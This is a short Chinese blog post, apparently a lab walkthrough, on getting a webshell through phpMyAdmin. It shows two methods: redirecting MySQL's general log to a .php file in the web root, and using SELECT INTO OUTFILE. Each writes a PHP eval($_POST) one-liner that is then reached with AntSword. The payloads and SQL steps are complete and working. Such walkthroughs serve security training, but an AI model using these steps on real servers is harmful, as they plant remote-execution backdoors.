PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
unable code2 小时前
攻防世界-Web-unseping
网络安全·web·ctf
Cyyyy_g4 小时前
大米CMS支付漏洞复现报告
网络安全
Le_ee14 小时前
Apache2
服务器·网络安全·apache·web
小张的博客之旅17 小时前
2025年“羊城杯”网络安全大赛 线上初赛 (WriteUp)
python·学习·网络安全
unable code18 小时前
攻防世界-Web-shrine
网络安全·web·ctf
缘友一世1 天前
活动目录的枚举学习
学习·网络安全·网路攻击
Tajang1 天前
推荐一个浏览器代理插件(Tajang Proxy),支持Chrome和Edge
前端·chrome·网络安全·渗透测试·靶场·edge
lubiii_2 天前
SQLMap常用命令指南(参数及其用法)
sql·web安全·网络安全
北'辰2 天前
VMware安装Kali-Linux
linux·网络安全
盛满暮色 风止何安2 天前
防火墙的类别和登录Web的方法
linux·运维·服务器·网络·网络协议·tcp/ip·网络安全